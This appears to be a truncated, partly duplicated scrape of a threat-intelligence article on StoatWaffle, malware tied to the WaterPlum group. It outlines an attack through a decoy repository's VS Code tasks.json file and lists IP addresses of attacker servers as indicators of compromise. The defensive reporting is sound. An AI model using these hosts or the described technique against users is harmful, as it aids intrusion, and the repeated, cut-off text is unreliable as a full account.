StoatWaffle, malware used by WaterPlum
Contents
This article is English version of "WaterPlumが使用するマルウェアStoatWaffleについて" translated by Ryu Hiyoshi, NSJ SOC analyst.
The original article is authored by NSJ SOC analyst Rintaro Koike.
Introduction
WaterPlum is regarded as an attacking group related to North Korea. They are known to have been operating Contagious Interview attacking campaign. WaterPlum can be classified into multiple clusters (or teams), and among them, activity by Team 8 (also known as Moralis or Modilus family) has been observed.
In Contagious Interview campaign, Team 8 has been mainly using OtterCookie. Starting around December 2025, Team 8 started using new malware. We named this malware StoatWaffle.
In this article, we'll introduce the latest attacking flow for WaterPlum Team 8 and in deep analysis result of StoatWaffle, new malware that they started using just recently.
Attack Flow
Team 8 leverages a project related to blockchain as a decoy. This malicious repository contains .vscode
directory that contains tasks.json file. If a user opens and trusts this …
The original article is authored by NSJ SOC analyst Rintaro Koike.
Introduction
WaterPlum is regarded as an attacking group related to North Korea. They are known to have been operating Contagious Interview attacking campaign. WaterPlum can be classified into multiple clusters (or teams), and among them, activity by Team 8 (also known as Moralis or Modilus family) has been observed.
In Contagious Interview campaign, Team 8 has been mainly using OtterCookie. Starting around December 2025, Team 8 started using new malware. We named this malware StoatWaffle.
In this article, we'll introduce the latest attacking flow for WaterPlum Team 8 and in deep analysis result of StoatWaffle, new malware that they started using just recently.
Attack Flow
Team 8 leverages a project related to blockchain as a decoy. This malicious repository contains .vscode
directory that contains tasks.json file. If a user opens and trusts this …
IoC
http://66.235.168.136
http://147.124.202.208
http://163.245.194.216
http://185.163.125.196
http://87.236.177.9
66.235.168.136
87.236.177.9
185.163.125.196
147.124.202.208
163.245.194.216
http://147.124.202.208
http://163.245.194.216
http://185.163.125.196
http://87.236.177.9
66.235.168.136
87.236.177.9
185.163.125.196
147.124.202.208
163.245.194.216